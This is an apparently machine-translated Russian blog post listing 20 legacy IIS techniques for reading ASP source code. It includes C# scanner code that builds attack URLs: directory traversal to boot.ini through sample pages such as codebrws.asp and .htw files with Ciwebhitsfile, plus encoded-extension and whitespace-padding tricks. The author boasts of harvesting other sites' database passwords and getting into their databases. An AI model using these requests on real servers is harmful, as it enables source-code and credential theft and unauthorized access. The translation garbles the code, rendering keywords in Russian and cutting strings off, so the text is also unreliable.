Как мы все знаем, платформа Windows имеет много лазейков, патчи - это один за другим, но ее всегда недостаточно, чтобы восполнить это. Я суммировал 20 методов, которые я знаю о просмотре исходного кода ASP, и написал приложение в C# для сканирования этих уязвимостей. Но в последние два дня я действительно видел исходный код многих веб -сайтов, включая пароли базы данных. в базу данных и делайте все, что хотите. Во -первых, перечислите эти 20 методов ниже:
| Полем %81 ::ДАННЫЕ %2e %2e%41sp +.htr // Longhtr .bak codebrws.asp ShowCode.asp null.htw qfullhit.htw qsumrhit.htw Query.idq Поиск/qfullhit.htw Поиск/qsumrhit.htw iirturnh.htw .htw Перевод: ф |
Первые 10 из приведенных выше уязвимостей добавляются непосредственно в файл ASP, например, %81 - это XXX.ASP %81. : F Метод доступен непосредственно через браузер Загрузите все с моего сайта.
| Switch (this.cbomethod.selectedIndex) { Случай 0: // Читать напрямую strrequestfile = strserver + strurl; перерыв; Случай 5: //%2e%41sp strrequestfile = strserver + strpath + strfirst + %2e %41sp; перерыв; Случай 8: // longhtr strrequestfile = strserver + strurl + +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%. перерыв; Случай 10: //codebrws.asp strrequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp?source= + strurl; перерыв; case 11: //showcode.asp strrequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp?source= + /msadc/../../../boot.ini; перерыв; Случай 12: //null.htw strrequestfile = strserver + /null.htw?ciwebhitsfile= + strurl + %20 & cirestriction = none & cihilitetype = full; перерыв; Случай 13: //qufullhit.htw strrequestfile = strserver + /iissamples/issamples/oop/qufullhit.htw? + Ciwebhitsfile =/../../boot.ini & cirestriction = none + & Cihilitetype = полный; перерыв; Случай 14: //qsumrhit.htw strrequestfile = strserver + /iissamples/issamples/oop/qsumrhit.htw? + Ciwebhitsfile =/../../boot.ini & cirestriction = none + & Cihilitetype = полный; перерыв; Случай 15: //Query.idq strrequestfile = strserver + /qquery.idq?ctemplate=/../../boot.ini +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htx; перерыв; case 16: //search/qufullhit.htw strrequestfile = strserver + /iissamples/exair/search/qufullhit.htw? + Ciwebhitsfile =/../../boot.ini & cirestriction = none + & Cihilitetype = полный; перерыв; Случай 17: // search/qsumrhit.htw strrequestfile = strserver + /iissamples/exair/search/qsumrhit.htw? + Ciwebhitsfile =/../../boot.ini & cirestriction = none + & Cihilitetype = полный; перерыв; Случай 18: //iirturnh.htw strrequestfile = strserver + /iishelp/iis/misc/iirturnh.htw? + Ciwebhitsfile =/../../boot.ini & cirestriction = none + & Cihilitetype = полный; перерыв; Случай 19: //.htw strrequestfile = strserver + strurl +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%.htw? + Ciwebhitsfile =/../../boot.ini & cirestriction = none + & Cihilitetype = полный; перерыв; по умолчанию: strrequestfile = strserver + strurl + this.cbomethod.text; } |